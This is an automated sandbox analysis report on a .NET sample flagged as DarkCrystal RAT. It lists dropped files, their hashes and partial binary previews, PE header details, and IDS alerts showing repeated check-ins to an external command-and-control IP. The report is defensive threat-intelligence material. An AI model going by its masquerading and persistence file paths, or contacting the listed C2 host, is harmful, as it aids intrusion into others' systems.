Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\UciiGfGr.log

Download File

Process:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\edFhLbSI.log

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fQNZqrBZ.log

Download File

Process:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\oMZxvDXp.log

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tdboTeDy.log

Download File

Process:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xcpeKNWo.log

Download File

Process:	C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Windows\Branding\17c9f4d4cfaa6e

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with very long lines (543), with no line terminators
Category:	dropped
Size (bytes):	543
Entropy (8bit):	5.880338643802056
Encrypted:	false
SSDEEP:	12:CrPlWnWQwVdM31p7TGTGRQcOPW5BJf2YUKXcl4YgDdwDpNFHLL4:tntw7Cp5RqO5zFUKXcC3DcNB0
MD5:	141FA392CDC6B1A49EB898310977F3F8
SHA1:	05F986AFC41E3887FFAE000940EB435FBA3DCA36
SHA-256:	36A3D71BD3DA960E8C676DBF0A563500DF01639D8AF45BDB561F4745F8BDDF79
SHA-512:	3EA5E2643EF2915EF8E9CE63854FFEE505C256757120B4240F2406654C3C7140BF8CE215229617B36696E3F9CE65F17ACCE891FF0AF66D5F9B2020ABA8DFA446
Malicious:	false
Preview:	b4fJMMKpjianvvu6niISEjkEOLE2EOeXHyhAMW6Xqb77hL8pmRxV2yc2Ua5BHSlVEDf7OtuRmulnlnhCMZPwbIeSVoqva4PY0m2dpBa3gftHMzRq32ysCy46iNljD91reNx9vDXL8WP5YXFfXA2hGhVBs64cZ10hoBn9CS5zfmtqi8hLHFLCGTk62vQyJ5vHgrQWtGdFFDCdyoctZsVTqxbVbrHRBGpk1mK0sKcAmF7CRGHNShYajbasQ55C9ME8XcmMemAOQUrk0YDUj48dsPAZLbkxPZBaB8ozd4sqgJJPu0211kdENkQIbNBDCN91SQj1tO0oLS7iFuoUis5o66NasgXQ3ooSJS6dQBImuy34nsDriqfTSV5WDJJN1kuhooYwyLEgjS3HDSwAcqsNJUAyXkaH24vKDVQ9TQ2Xm9t9bxSvWIvL2hYUokZOv6ophtDrBxqLxUkKkAWjRoutJkSf76Vt1omqVEcruktjcjYh7OtnOz6GL4f7bhtFc7UIs4yfiozq5KQkLuitMrfBrgeaieQM1oH

C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1958912
Entropy (8bit):	7.551015834552122
Encrypted:	false
SSDEEP:	49152:RbYg0qXO9NNBZXRd6ewK8LrcOk+tWh08RT:hYg039NNBx3lGMh08R
MD5:	FECAFE9A80257E221C47577E704498F3
SHA1:	79960AA863F445B93531AFC55AAD6215A2C1BB08
SHA-256:	953D9C6534DD4DDA5DC6C53755974E39947672EA521DDFB613A8C28A4F3C10E3
SHA-512:	C48694E93A5B46BB9CB6ADA78E8AD642D142BE7B27249BB5E75521B14EB5805C9CD51FA7836D91C40840F2E7FBB46E4B8AEEDB9EAB688FC26020EBA03F381141
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................ .......H.......h...............(...'...d........................................0..........(.... ........8........E....)...N.......M...8$...(.... ....~z...{....9....& ....8....(.... ....~z...{....:....& ....8....(.... ....~z...{....:....& ....8y......0.......... ........8........E............%.......p.......8....r...ps....z~....9y... ....8....~....(3... .... .... ....s....~....(7....... ....~z...{....9~...& ....8s...8.... ....~z...{....:Z...& ....8O......... ....8?.......~....(;..

C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\0J5DzstGPi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\System32\CSC7B104E16ED56415BA0A4E98DBA784BC.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9534537719925007
Encrypted:	false
SSDEEP:	48:6kpHPtVM7Jt8Bs3FJsdcV4MKe27gy5vqBHaOulajfqXSfbNtm:7PMPc+Vx9Mg+vkEcjRzNt
MD5:	424D3F1DC8037CD599A65932C0E7789E
SHA1:	4BE9F147B3BE4EAEA9A6E1E80CF9FE6DB5FF4173
SHA-256:	4D3F002302EEEC2926924E3BA742A7DC7AE04E2C157EE6F8A7E5E015D5968F8F
SHA-512:	5D0884F93369BCDD953FEFD5AFDA1D230B9E02E3FE814D7AB12995AC8D6820D046986850ACC98C8EF788CCF8D6F505114ED74A4B0A6A3F81DAD29D6B8FBA84D1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{g.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.818119054309332
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FX+XXQvg9RLNQDRJdNvpKB9cuaNvj:Vx993DEUj/zLCNJgBr8
MD5:	FF9D4539E7742570299CC3596DF222B3
SHA1:	E66027D02EAE678AB7CC3F0FC7E4322B2C37803D
SHA-256:	783ADE59C449E73EC6E67BD61EA6392D76EB59236487490260361514B90DC975
SHA-512:	190ED7B3481FA9DE51249BF26C1E650C07905354DC7151C53A1EC4814EEAB30847AA7D4C011278274B70B1993B03D8DDA3A5BB16DBE0A0AB4267B23935C7515F
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 06/01/2025 05:51:04..05:51:04, error: 0x80072746.05:51:09, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.551015834552122
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	0J5DzstGPi.exe
File size:	1'958'912 bytes
MD5:	fecafe9a80257e221c47577e704498f3
SHA1:	79960aa863f445b93531afc55aad6215a2c1bb08
SHA256:	953d9c6534dd4dda5dc6c53755974e39947672ea521ddfb613a8c28a4f3c10e3
SHA512:	c48694e93a5b46bb9cb6ada78e8ad642d142be7b27249bb5e75521b14eb5805c9cd51fa7836d91c40840f2e7fbb46e4b8aeedb9eab688fc26020eba03f381141
SSDEEP:	49152:RbYg0qXO9NNBZXRd6ewK8LrcOk+tWh08RT:hYg039NNBx3lGMh08R
TLSH:	4295AE1665D18E32C27897764697123E4291E7B63612EF0B390FA1E3BC177F18A631B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. .......................@............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x5dfa3e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BB170E [Tue Aug 13 08:19:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1df9f0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e0000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1dda44	0x1ddc00	cb6f37afe3a627fe6817bcb836b358f7	False	0.7833819826007326	data	7.554404258282237	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1e0000	0x320	0x400	d05b66fd093f5688f9c78aee72f6d256	False	0.349609375	data	2.6430868172484443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1e2000	0xc	0x200	55bc51df64f53bb11ff245503bdfd33f	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1e0058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-06T10:32:22.979868+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49737	185.158.202.52	80	TCP
2025-01-06T10:32:47.962695+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49738	185.158.202.52	80	TCP
2025-01-06T10:32:56.041267+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49739	185.158.202.52	80	TCP
2025-01-06T10:33:05.478784+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49782	185.158.202.52	80	TCP
2025-01-06T10:33:08.131571+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49798	185.158.202.52	80	TCP
2025-01-06T10:33:15.150710+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49834	185.158.202.52	80	TCP
2025-01-06T10:33:19.955460+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49865	185.158.202.52	80	TCP
2025-01-06T10:33:42.144023+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49992	185.158.202.52	80	TCP
2025-01-06T10:33:51.433463+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50011	185.158.202.52	80	TCP
2025-01-06T10:33:54.546858+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50012	185.158.202.52	80	TCP
2025-01-06T10:33:59.945702+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50013	185.158.202.52	80	TCP
2025-01-06T10:34:03.737223+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50014	185.158.202.52	80	TCP
2025-01-06T10:34:26.981496+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50015	185.158.202.52	80	TCP
2025-01-06T10:34:38.119621+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50016	185.158.202.52	80	TCP
2025-01-06T10:34:45.119629+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	50017	185.158.202.52	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 10:32:22.252398014 CET	49737	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:22.257217884 CET	80	49737	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:22.257349968 CET	49737	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:22.258539915 CET	49737	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:22.263330936 CET	80	49737	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:22.604522943 CET	49737	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:22.610296965 CET	80	49737	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:22.899094105 CET	80	49737	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:22.979867935 CET	49737	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:23.030473948 CET	80	49737	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:23.166249037 CET	49737	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:23.528623104 CET	49737	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:47.160993099 CET	49738	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:47.165899992 CET	80	49738	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:47.165973902 CET	49738	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:47.166146994 CET	49738	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:47.170876026 CET	80	49738	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:47.510158062 CET	49738	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:47.515029907 CET	80	49738	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:47.830596924 CET	80	49738	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:47.962645054 CET	80	49738	185.158.202.52	192.168.2.4
Jan 6, 2025 10:32:47.962694883 CET	49738	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:48.078732014 CET	49738	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:55.328229904 CET	49739	80	192.168.2.4	185.158.202.52
Jan 6, 2025 10:32:55.333245993 CET	80	49739	185.158.202.52	192.168.2.4
